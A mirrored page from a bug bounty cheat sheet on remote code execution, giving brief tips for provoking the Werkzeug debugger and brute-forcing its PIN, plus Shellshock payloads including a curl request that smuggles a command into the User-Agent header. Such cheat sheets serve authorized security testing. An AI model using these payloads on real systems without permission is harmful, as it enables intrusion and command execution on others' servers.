mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2024-11-22 11:03:14 +00:00
527 B
527 B
RCE
Werkzeug Debugger
Find somewhere where user input can be supplied and submit the following string to cause an error:
strіng
If the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: ***-***-***
.
Shellshock Bug
() { :;}; echo vulnerable
curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/